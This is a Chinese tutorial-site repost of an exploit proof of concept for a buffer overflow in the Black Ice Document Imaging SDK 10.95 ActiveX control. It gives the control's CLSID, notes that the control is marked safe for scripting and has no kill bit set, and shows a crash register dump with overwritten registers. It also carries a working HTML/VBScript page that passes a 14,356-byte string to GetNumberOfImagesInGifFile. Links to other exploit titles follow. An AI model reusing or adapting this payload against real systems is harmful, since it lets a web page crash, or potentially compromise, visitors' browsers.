手机
当前位置:查字典教程网 >网络安全 >Exploit >Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
摘要:SubBoombuff=String(14356,"A")test.GetNumberOfImagesInGifFilebuffEndSub

<!--

Document Imaging SDK Buffer Overflow Vulnerability

DoS Proof of concept

Author: r0ut3r

Mail : writ3r [at] gmail.com

-----------------------------

-Tested on WinXP Pro SP2

Version: 10.95

Vendor : Black Ice Software

Price : $999

File : biimgfrm.ocx

CLSID: {79956462-F148-497F-B247-DF35A095F80B}

DLL Settings:

RegKey Safe for Script: True

RegKey Safe for Init : True

KillBitSet : False

Register:

EIP 7C91B3FB -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EAX 001919C0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EBX 41414141

ECX 00004141

EDX 00150168 -> 00000000

EDI 41414141

ESI 001919B8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EBP 0013EA20 -> 0013EAA4

ESP 0013E804 -> 0000021A

-----------------------------

-->

<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>

<script language='vbscript'>

Sub Boom

buff = String(14356, "A")

test.GetNumberOfImagesInGifFile buff

End Sub

</script>

<input type=button onclick=Boom() value='Boom?'>

【Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC】相关文章:

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

Mole Group Real Estate Script

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

PPMate PPMedia Class ActiveX Control Buffer Overflow PoC

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

EO Video 1.36 Local Heap Overflow DOS / PoC

精品推荐
分类导航